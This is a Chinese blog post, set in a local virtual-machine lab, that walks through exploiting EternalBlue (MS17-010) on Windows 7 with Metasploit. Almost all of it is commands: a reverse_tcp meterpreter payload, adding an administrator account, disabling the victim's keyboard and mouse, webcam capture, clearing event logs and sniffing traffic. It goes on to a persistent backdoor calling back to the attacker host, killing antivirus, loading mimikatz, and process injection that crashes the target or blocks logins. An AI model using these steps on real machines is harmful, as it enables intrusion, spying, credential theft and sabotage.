利用永恒之蓝(MS17-010)拿到电脑权限

利用永恒之蓝(MS17-010)拿到电脑win7(32位)权限(包含:开关受害电脑键盘/鼠标,文件上传,开启受害电脑的远程桌面,使用受害电脑摄像头拍照,重新启动受害人的计算机,植入一个持久性的后门,关闭防护软件,取消受害电脑用户登录,让受害电脑蓝屏等等......

 

严禁利用本文章中所提到的虚拟机或漏洞和技术进行非法攻击,否则后果自负,本人不承担任何责任。

 

Kali2021(链接:https://pan.baidu.com/s/1jzaqjiEQVEHQdRRIp72f3Q

提取码:tian

 

Win7 (32)(链接:https://pan.baidu.com/s/1r7Y3jA4hfb4sTKKh0ubNIw

提取码:tian

 

实验均为本地虚拟机(kali192.168.0.114)(win732位):192.168.0.115

 

文件:Eternalblue-Doublepulsar-Metasploit-master

(链接:https://pan.baidu.com/s/1MTQaSOrRSrFw_eWmnyr8Dw

提取码:tian

 

第一步:下载Eternalblue-Doublepulsar-Metasploit-master,将其解压放到root目录下重新命名为Eternalblue-Doublepulsar-Metasploit

 

    

第二步:Eternalblue-Doublepulsar-Metasploit文件中的eternalblue_doublepulsar.rb

拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb

     

 

命令顺序:

    (1)cd Eternalblue-Doublepulsar-Metasploit-master        #cd是切换文件目录

    (2)cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb     #拷贝

    (3)cd /usr/share/metasploit-framework/modules/exploits/windows/smb     #切换文件目录

 

第三步:然后在cd /usr/share/metasploit-framework/modules/exploits/windows/smb目录下

安装win 32架构

    dpkg --add-architecture i386 && apt-get update && apt-get install wine32

 

    安装过程中可能时间比较长,耐心等候.

     

    安装过程中的问题:

    (1)选择<NO>

    (2)选择cron

    

     

第四步:运行wine -h

     

第五步:然后再运行postgresql 数据库

    service postgresql start

     

第六步:打开msfconsole

    

第七步:使用exploit模块

     

命令顺序:

    (1use exploit/windows/smb/eternalblue_doublepulsar        #使用模块

    (2set payload windows/meterpreter/reverse_tcp          #设置payload

    (3show options                       #查看模块信息

    (4set rhosts 192.168.0.115                   #要攻击的受害电脑地址(win7

    (5set lhost 192.168.0.114                    #本地的kali地址

 方法1  6set processinject explorer.exe       #设置进程注入进入命令行下

       (7run       #攻击

         

        (8)execute  -H -i -f cmd.exe       #可以进到受害电脑的命令行下

         

        但你想查看ip地址等信息时出现乱码:

         

        (9)输入:chcp 65001

         

        (10)切换到受害电脑桌面:cd c:\users\administrator\desktop                                                

        将kali里的文件上传文件到受害电脑上:echo > 文件名

         

        受害电脑的效果:

         

        (11)添加用户名密码

         # net user tian3 123456 /add --net user 用户名 密码 /add

         # net localgroup Administrators tian3 /add --net localgroup Administrators 用户名 /add

         

        (12)输入:exit可以退到meterpreter

         

        (13#开关受害电脑键盘/鼠标:uictl   

        #开启或禁止键盘/鼠标:uictl [enable/disable] [keyboard/mouse/all]        

        #禁用鼠标: uictl disable mouse

        #禁用键盘: uictl disable keyboard

        此时受害电脑的鼠标已被禁用

        开启已被禁用的鼠标

        此时受害电脑的键盘已被禁用

        开启已被禁用的键盘

        (13#开启受害电脑的远程桌面:run vnc

        可以看到受害电脑做干什么.

         

        (14#查看受害电脑摄像头: webcam_list

        #通过受害电脑摄像头拍照: webcam_snap  

        #通过受害电脑摄像头开启视频: webcam_stream

        可以看到受害电脑没有安装摄像头.

         

        (15#受害电脑立马弹出来一个记事本程序:execute  -f notepad.exe

         #弹出来一个记事本这样太明显,如果希望隐藏后台执行,加参数-H  

          execute  -H -f notepad.exe

         

        可以看到受害电脑弹出来一个记事本.

         

        (16)#重新启动受害电脑的计算机:reboot

        

        受害电脑的效果:

        

        (17)#清除事件日志:clearev

         

        #网络嗅探

           加载嗅探模块: meterpreter > use sniffer

             列出目标主机所有开放的网络接口:meterpreter > sniffer_interfaces

             获取正在实施嗅探网络接口的统计数据:meterpreter > sniffer_start 1

             在目标主机上针对特定范围的数据包缓冲区启动嗅探:meterpreter > sniffer_dump 1 /root/test2.cap

         

        

          停止嗅探meterpreter > sniffer_stop 1

         

          新开msfconsole 一个对抓取的包进行解包:

            use auxiliary/sniffer/psnuffle         #使用模块

            set pcapfile test2.cap            #test2.cap为文件名字

            run             #攻击

          然后在shell中中输入:wireshark,加载这个/tmp/test2.cap包即可

         

         

        #植入后门 :  run  persistence -X -i  5  -p 4444 -r 192.168.0.114

          -X 在目标主机上开机自启动

          -i  不断尝试反向连接的时间间隔

          -r kali的地址

         

        #关闭防护软件:run killav

         

        #可见建立一个持久性的后门,设置成开机启动: run persistence

          #加载模块load/use

            load espia         --窃取及伪造域账户 token

            load incongnito     --在活动meterpreter会话中加载隐身模式

            load lanattacks     --调用TFTP命令,发起局域网攻击

            load powershell      --在终端启动一个powershell命令行

            load sniffer       --对目标网络实施嗅探抓包:加载sniffer插件

            load extapi       --加载其他扩展库

            load kiwi        --加载mimikatz windows密码破解模块

            load python       --加载python程序模块,调用python命令

            load winpmem     --调用msf内置模块进行内存取证

         

 方法26set processinject lsass.exe       —设置进程注入后1分钟受害电脑关机

         

        受害电脑的效果:

         

 方法36set processinject winlogon.exe       --设置进程注入取消受害电脑用户登录

         

        受害电脑的效果:

         

 方法46set processinject wininit.exe     --设置进程注入受害电脑蓝屏

         

        受害电脑的效果:

         

 

 

 

参考链接:https://blog.csdn.net/qq_41617034/article/details/91051614

 

posted @ 2022-01-28 11:45  西瓜k  阅读(917)  评论(0)    收藏  举报